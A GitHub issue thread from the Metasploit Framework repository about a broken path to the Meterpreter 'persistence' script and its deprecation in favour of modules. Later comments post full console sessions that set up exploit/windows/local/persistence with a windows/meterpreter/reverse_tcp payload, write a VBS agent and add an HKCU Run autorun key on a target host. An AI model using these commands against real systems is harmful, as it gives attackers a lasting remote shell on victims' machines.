search

rapid7 / metasploit-framework

Metasploit Framework
https://www.metasploit.com/
Other
34.21k stars 13.99k forks source link

incorrect path to persistence.rb #7875

Closed mark-r-stevens closed 7 years ago

mark-r-stevens commented 7 years ago

Steps to reproduce

How'd you do it?

  1. run persistence -h

line 82 in: lib/msf/base/sessions/scriptable.rb refers to incorrect script.

79 'metsvc' => 'post/windows/manage/persistence_exe', 80 'migrate' => 'post/windows/manage/migrate', …
81 'packetrecorder' => 'post/windows/manage/rpcapd_start', 82 'persistence' => 'post/window/manager/persistence_exe',

I installed Metasploit with:

bwatters-r7 commented 7 years ago

Well, that is a bug, but I think there might be more. When I correct that character, I get:

meterpreter > run persistence -h
[-] Error in script: ArgumentError wrong number of arguments (given 2, expected 0..1)
meterpreter > run persistence
[-] Error in script: ArgumentError wrong number of arguments (given 2, expected 0..1)
meterpreter > run killav -h
[-] Error in script: ArgumentError wrong number of arguments (given 2, expected 0..1)

I may be testing it incorrectly, though. Certainly, at the very least, we need to lose that 'r', though. Calling @wvu and @bcook-r7 for some clarification of behavior.

wvu commented 7 years ago

Hi.

mark-r-stevens commented 7 years ago

I also get the wrong number of arguments when I make the change.

On Jan 26, 2017, at 3:51 PM, wvu-r7 notifications@github.com wrote:

Hi.

— You are receiving this because you authored the thread. Reply to this email directly, view it on GitHub https://github.com/rapid7/metasploit-framework/issues/7875#issuecomment-275509686, or mute the thread https://github.com/notifications/unsubscribe-auth/ABao6hPCpQC78RIKXXN9mzF-i0ODpcw_ks5rWQdJgaJpZM4LvEz0.

wvu commented 7 years ago

Is there a reason you're using the Meterpreter script instead of a post module or local exploit?

mark-r-stevens commented 7 years ago

Probably user error.

  1. Using version 4.13.14-dev on Kali 2. typed following commands and worked: msf> session -i 2 msf> run persistence -h

get back help.

  1. run msfupdate to latest version msf> session -i 2 msf> run persistence -h

get error on path to script not found. change path error, get error on number of arguments.

Perhaps I was using persistence wrong all along?

On Jan 26, 2017, at 5:24 PM, wvu-r7 <notifications@github.com mailto:notifications@github.com> wrote:

Is there a reason you're using the Meterpreter script instead of a post module or local exploit?

— You are receiving this because you authored the thread. Reply to this email directly, view it on GitHub https://github.com/rapid7/metasploit-framework/issues/7875#issuecomment-275533052, or mute the thread https://github.com/notifications/unsubscribe-auth/ABao6sLC5J3GXXdDJOiJECz88XitFjnWks5rWR0FgaJpZM4LvEz0.

mark-r-stevens commented 7 years ago

Probably user error. 1. Using version 4.13.14-dev on Kali 2. typed following commands and worked:msf> session -i 2msf> run persistence -hget back help.2. run msfupdate to latest versionmsf> session -i 2msf> run persistence -hget error on path to script not found. change path error, get error on number of arguments.Perhaps I was using persistence wrong all along?On Jan 26, 2017, at 5:24 PM, wvu-r7 notifications@github.com wrote:Is there a reason you're using the Meterpreter script instead of a post module or local exploit?—You are receiving this because you authored the thread.Reply to this email directly, view it on GitHub, or mute the thread.

{"api_version":"1.0","publisher":{"api_key":"05dde50f1d1a384dd78767c55493e4bb","name":"GitHub"},"entity":{"external_key":"github/rapid7/metasploit-framework","title":"rapid7/metasploit-framework","subtitle":"GitHub repository","main_image_url":"https://cloud.githubusercontent.com/assets/143418/17495839/a5054eac-5d88-11e6-95fc-7290892c7bb5.png","avatar_image_url":"https://cloud.githubusercontent.com/assets/143418/15842166/7c72db34-2c0b-11e6-9aed-b52498112777.png","action":{"name":"Open in GitHub","url":"https://github.com/rapid7/metasploit-framework"}},"updates":{"snippets":[{"icon":"PERSON","message":"@wvu-r7 in #7875: Is there a reason you're using the Meterpreter script instead of a post module or local exploit?"}],"action":{"name":"View Issue","url":"https://github.com/rapid7/metasploit-framework/issues/7875#issuecomment-275533052"}}}

wvu commented 7 years ago

No, I mean a module like exploit/windows/local/persistence. When you do run persistence, you're running the script. Scripts have been deprecated for literally years. :)

mark-r-stevens commented 7 years ago

I will give that a try. The internet is out of date :)

On Jan 27, 2017, at 10:35 AM, wvu-r7 notifications@github.com wrote:

No, I mean a module like exploit/windows/local/persistence. When you do run persistence, you're running the script. Scripts have been deprecated for literally years. :)

— You are receiving this because you authored the thread. Reply to this email directly, view it on GitHub https://github.com/rapid7/metasploit-framework/issues/7875#issuecomment-275693632, or mute the thread https://github.com/notifications/unsubscribe-auth/ABao6kKgauLmBJlFhFqgAlmsaw_EfdLEks5rWg7JgaJpZM4LvEz0.

wvu commented 7 years ago

It sure is! Take a look at #7823 if you will. I'm fixing this as we speak.

busterb commented 7 years ago

Where on the internet did you get the advice? I think we should probably throw a big fat message up when someone uses meterpreter script these days, and try to get ancient blogs and training updated to the new method.

mark-r-stevens commented 7 years ago

googled metasploit persistence. This was the first page that came up:

https://www.offensive-security.com/metasploit-unleashed/meterpreter-service/

On Jan 27, 2017, at 12:21 PM, Brent Cook notifications@github.com wrote:

Where on the internet did you get the advice? I think we should probably throw a big fat message up when someone uses meterpreter script these days, and try to get ancient blogs and training updated to the new method.

— You are receiving this because you authored the thread. Reply to this email directly, view it on GitHub https://github.com/rapid7/metasploit-framework/issues/7875#issuecomment-275721244, or mute the thread https://github.com/notifications/unsubscribe-auth/ABao6uvG8ZPAbQeslOfvHIkBwFECw_S1ks5rWiezgaJpZM4LvEz0.

busterb commented 7 years ago

this should be fine now

locoalien commented 7 years ago

Hello

Look at the following example in which "run persistence" can be used correctly. With the new update of the Metasploit Framework, the way to execute the command correctly is to keep the session in the background while executing the exploit "/exploit/windows/local/persistence".

The following example shows clearly how to use it:

`meterpreter > sessions 1 //Session in Background [*] Backgrounding session 5... [-] Invalid session identifier: 1 msf exploit(handler) > sessions

Active sessions

Id Type Information Connection

5 meterpreter x86/windows NAME_PC @ SOFT-5493BEF518 IP:80 -> IP_VICTIMA:56616 (10.0.2.15)

msf exploit(handler) > use exploit/windows/local/persistence msf exploit(persistence) > set SESSION 5 SESSION => 5 msf exploit(persistence) > set LHOST IP_LOCAL LHOST => IP_LOCAL msf exploit(persistence) > set LPORT 80 LPORT => 80 msf exploit(persistence) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp msf exploit(persistence) > run

[] Running persistent module against NAME_PC via session ID: 5 [+] Persistent VBS script written on SOFT-5493BEF518 to C:\DOCUME~1\LOCOAL~1\CONFIG~1\Temp\HZgSBAKZlmgwW.vbs [] Installing as HKCU\Software\Microsoft\Windows\CurrentVersion\Run\hBHDMxJ [+] Installed autorun on SOFT-5493BEF518 as HKCU\Software\Microsoft\Windows\CurrentVersion\Run\hBHDMxJ [] Clean up Meterpreter RC file: /root/.msf4/logs/persistence/SOFT-5493BEF518_20170131.4255/SOFT-5493BEF518_20170131.4255.rc msf exploit(persistence) > sessions -i 5 [] Starting interaction with 5...

meterpreter > ls Listing: C:\Documents and Settings\RUTE`

OJ commented 7 years ago

Let me guess, you're running Kali?

locoalien commented 7 years ago

Yes sr

OJ commented 7 years ago

You'll have to wait until Kali gets updated.

wvu commented 7 years ago

@locoalien: You're using the wrong run command if you want to do it within Meterpreter.

msf > run persistence -U -i 5 -p 80 -r IP_LOCAL
[-] Unknown command: run.

This is the console prompt. Interact with the session first.

locoalien commented 7 years ago

Hello @wvu-r7 As I have done it works correctly. For the latest version of Metasploit you have a problem entering the command run persistence -U -i 5 -p 80 -r IP_LOCAL. Then opt for the alternative posed in the previous post for people who present the problem by entering the command you mention.

wvu commented 7 years ago

You're on Kali. It's not the latest version until the next update ships.

meterpreter > run persistence -U -i 5 -p 80 -r [redacted]

[!] Meterpreter scripts are deprecated. Try post/windows/manage/persistence_exe.
[!] Example: run post/windows/manage/persistence_exe OPTION=value [...]
[*] Running Persistence Script
[*] Resource file for cleanup created at /Users/wvu/.msf4/logs/persistence/[redacted]_20170201.2430/[redacted]_20170201.2430.rc
[*] Creating Payload=windows/meterpreter/reverse_tcp LHOST=[redacted] LPORT=80
[*] Persistent agent script is 99589 bytes long
[+] Persistent Script written to C:\Windows\TEMP\iVTecA.vbs
[*] Executing script C:\Windows\TEMP\iVTecA.vbs
[+] Agent executed with PID 7236
[*] Installing into autorun as HKCU\Software\Microsoft\Windows\CurrentVersion\Run\XFdjPLMihMasat
[+] Installed into autorun as HKCU\Software\Microsoft\Windows\CurrentVersion\Run\XFdjPLMihMasat
meterpreter >

This is what you should see if you're on master.

wvu commented 7 years ago

@locoalien: Wait, are you providing advice or seeking it? It sounds like you're providing advice. If that's the case, your followup suggestion is correct. You can safely disregard what I'm saying. Thanks!